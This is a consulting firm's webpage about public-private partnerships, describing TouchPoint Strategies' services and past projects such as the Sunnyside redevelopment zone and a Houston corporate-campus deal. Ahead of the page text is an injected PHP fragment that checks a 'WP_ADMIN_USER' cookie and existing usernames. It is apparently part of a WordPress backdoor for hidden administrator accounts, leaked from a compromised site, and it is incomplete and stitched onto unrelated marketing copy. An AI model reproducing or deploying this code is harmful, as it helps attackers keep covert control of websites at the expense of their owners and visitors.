if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Public-Private Partnerships | TouchPoint

Public-Private Partnerships

Public-Private Partnerships

Successful public-private partnerships require the right project, the right terms and the right team. TouchPoint Strategies has facilitated more than $400 million in successful public-private partnerships that has led to over $6 billion in new development and hundreds of new jobs.

We build value for innovative public and private sector entities by viewing potential partnerships through the lens of our experience in real estate development and finance.

Tools & Services

Economic Development Consulting

Zone/District Administration

Strategic Partnership Facilitation

Past Projects

The Allen

Negotiated a Community Benefits Agreement that includes hospitality and property management internship opportunities, affordable housing commitment, Minority Business Enterprise supplier commitment, and a job training program.

Sunnyside Redevelopment Authority / TIRZ 26

The TouchPoint Team is currently managing the economic development, public engagement, and finance strategy implementation for the Sunnyside Tax Increment Reinvestment Zone. We oversaw an annexation that doubled the Zone footprint, led the creation of the Sunnyside Redevelopment Authority and the activation of the Sunnyside Management District, and updated the Zone Financing Plan to accommodate a $20 million bonding authority.

Houston Exxon/Springwoods Redevelopment

Created a successful economic development strategy for the creation of a $90 million public-private partnership to fund critical infrastructure for a new corporate campus.